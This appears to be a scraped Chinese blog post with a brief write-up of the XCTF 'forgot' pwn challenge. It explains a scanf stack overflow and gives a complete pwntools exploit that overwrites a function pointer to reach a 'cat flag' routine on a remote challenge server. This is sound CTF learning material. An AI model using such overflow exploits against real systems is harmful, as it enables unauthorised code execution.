当前位置: 首页 > news >正文

攻防世界2

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()


http://www.mrgr.cn/news/49457.html

相关文章:

  • 安全可靠测评结果公告(2024年第1号)
  • 常见开源组件的详解
  • ```python
  • 文本生成视频技术:艺术与科学的交汇点
  • RHCSA的学习(5)
  • 3D医学影像开发入门<二>:VS2019+Qt5.15.2+VTK9.3.1编译及环境配置
  • Gin入门指南:从零开始快速掌握Go Web框架Gin
  • 【10月13日晴】A股下周趋势分析
  • MongoDB的基本内容和应用场景介绍
  • pip安装指定版本的tensorflow
  • 卡尔曼滤波器原理介绍
  • leetcode 1027 最长等差数列 题目的思考
  • 【前端】Bootstrap:快速开始
  • DataStore存储数据+加上加密
  • C++的类和动态内存分配(深拷贝与浅拷贝)并实现自己的string类
  • vue3之 shallowRef、markRaw
  • [Linux] 软硬链接
  • 7.2-I2C的DMA中断
  • RAII - 安卓中的智能指针
  • 如何有效参与机器人顶会?——周易教授PRE-IROS 2024分享